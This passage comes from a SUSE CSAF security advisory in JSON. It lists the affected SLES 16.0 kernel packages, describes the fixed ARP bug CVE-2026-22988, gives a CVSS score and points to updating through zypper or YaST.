"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2026-22986"
},
{
"cve": "CVE-2026-22988",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22988"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\narp: do not assume dev_hard_header() does not change skb-\u003ehead\n\narp_create() is the only dev_hard_header() caller\nmaking assumption about skb-\u003ehead being unchanged.\n\nA recent commit broke this assumption.\n\nInitialize @arp pointer after dev_hard_header() call.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22988",
"url": "https://www.suse.com/security/cve/CVE-2026-22988"
},
{
"category": "external",
"summary": "SUSE Bug 1257282 for CVE-2026-22988",
"url": "https://bugzilla.suse.com/1257282"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
